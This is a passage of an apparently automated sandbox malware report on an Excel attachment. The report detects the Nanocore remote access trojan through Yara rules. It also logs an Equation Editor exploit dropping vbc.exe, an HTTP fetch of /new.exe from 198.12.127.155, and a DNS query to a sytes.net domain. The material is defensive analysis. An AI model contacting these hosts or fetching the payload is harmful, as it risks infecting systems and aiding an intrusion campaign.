          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFD606D5.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /new.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.127.155Connection: Keep-Alive
          Source: unknownDNS traffic detected: queries for: wekeepworking.sytes.net
          Source: RegAsm.exe, 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmpString found in binary or memory: http://google.com
          Source: RegAsm.exe, 00000005.00000002.2364096438.0000000002630000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: RegAsm.exe, 00000005.00000002.2364096438.0000000002630000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: FFD606D5.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
          Source: RegAsm.exe, 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

          E-Banking Fraud:

          barindex
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de4629.13.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de0000.14.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de0000.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2364015213.0000000000E80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2363541585.00000000005A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2363994318.0000000000E10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2363897217.0000000000C10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2363548286.00000000005B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2363938383.0000000000CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2363557929.00000000005C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: Process Memory Space: vbc.exe PID: 1616, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: Process Memory Space: vbc.exe PID: 1616, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.c10000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.cb0000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.e80000.19.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.6c0000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.3b67402.28.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.2a5109c.23.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.c00000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.e1e8a4.18.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.a40000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.5b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.5c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.5b0000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.5a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.e80000.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.2a44ddc.25.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.e10000.17.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.a50000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.de4629.13.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.de0000.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.c10000.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.cb0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.3b73634.26.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.de0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.5c0000.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.c00000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.6c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.660000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.a50000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.e10000.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.e14c9f.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.2a5109c.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.2a5109c.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.2a3fd90.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.2a3fd90.24.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.2a44ddc.25.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.2a44ddc.25.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001D3DD04_2_001D3DD0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00431C024_2_00431C02
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00431C204_2_00431C20
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00431B974_2_00431B97
          Source: C:\Users\Public\vbc.exeCode function: 4_2_042C9E184_2_042C9E18
          Source: C:\Users\Public\vbc.exeCode function: 4_2_042C63E84_2_042C63E8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_042CF7304_2_042CF730
          Source: C:\Users\Public\vbc.exeCode function: 4_2_042C00484_2_042C0048
          Source: C:\Users\Public\vbc.exeCode function: 4_2_042C00444_2_042C0044
          Source: C:\Users\Public\vbc.exeCode function: 4_2_04A000484_2_04A00048
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_003C3DFE5_2_003C3DFE
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_003544F05_2_003544F0
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_003538D85_2_003538D8
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_0035CB705_2_0035CB70
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_0035BF585_2_0035BF58
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_003545A85_2_003545A8
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_0035CC2E5_2_0035CC2E
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_00CD08C85_2_00CD08C8
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_00CD15785_2_00CD1578
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_00CD16365_2_00CD1636
          Source: Ref 0180066743.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RegAsm.exe 5FF87E563B2DF09E94E17C82741D9A43AED2F214643DC067232916FAE4B35417
          Source: new[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: new[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: new[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: win33.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: win33.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: win33.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000002.2364015213.0000000000E80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2364015213.0000000000E80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000002.2363541585.00000000005A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363541585.00000000005A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000002.2363994318.0000000000E10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363994318.0000000000E10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000002.2363897217.0000000000C10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363897217.0000000000C10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
